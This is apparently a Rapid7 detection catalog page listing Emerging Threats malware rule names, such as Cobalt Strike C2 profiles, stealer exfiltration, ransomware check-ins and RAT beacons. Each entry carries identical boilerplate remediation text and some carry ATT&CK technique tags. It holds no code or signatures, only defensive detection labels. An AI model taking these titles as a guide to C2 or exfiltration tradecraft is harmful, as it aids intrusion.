  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (JPEG)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (PNG)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (RIFF)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 (Custom)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Custom)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Custom Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Havex APT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (jquery Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Magnitude EK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Meterpreter)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Microsoft Update GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (MSDN Query Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 OCSP Profile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (OneDrive)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (bg)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (btn_bg)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (extension.css)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (Teams) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (Teams) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (QiHoo Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Request (Stackoverflow Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Safebrowse Profile) GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Safebrowse Profile) POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (TrevorForget Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Webbug Profile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Wordpress Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cohhoc RAT CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoinVault CnC Beacon M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CoinVault CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CoinVault POST M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CollectorStealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Comfoo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Comfoo Outbound Communication

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CommentCrew downloader without user-agent string exe download without User Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CommentCrew Possible APT backdoor download logo.png

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Access Count Tracking URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Count Tracking URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Count Tracking URL (partner)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (farfly checkin)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (pid - mac)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (wmid - ucid)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Trojan HTTP GET Logging

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre Header Structure 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre Header Structure 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre URI/Headers Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Zbot EXE filename Dec 09 2013

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE COMRAT CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ConstructorWin32/Agent.V

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE contacy.info Trojan Checkin (User agent clk_jdfhid)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cookies/Cookiebag Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Module Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Module Download 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Requesting Module

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoreDn CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoreDn CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Covenant Framework HTTP Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyCar CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyCar V2 CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyDuke APT HTTP GET CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyDuke APT HTTP POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Criptobit/Mobef Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE CROSSWALK CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cryptojoker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cryptolocker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoLocker EXE Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoLuck / YafunnLocker Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE CryptoPatronum Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE CryptoShield Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Cryptowall 2.0 DL URI Struct Oct 2 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall Check-in M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall CryptoWall 3.0 Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CSharp SMB Scanner Assembly in PowerShell Inbound M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CSharp SMB Scanner Assembly in PowerShell Inbound M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Curso Banker Downloading Modules

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CyberGate RAT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CyberGate RAT User-Agent (USER_CHECK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cyborg Ransomware - Downloading Desktop Background

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Cycbot POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE D1onis Stealer Sending Data to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Initial Macro Execution

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Payload Execution

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Payload Extraction

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Daemonize.ft HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dalexis CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dalexis Downloading EXE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot Associated Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot UA Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkGate CNC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkGate CnC Requesting Data Exfiltration from Bot

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

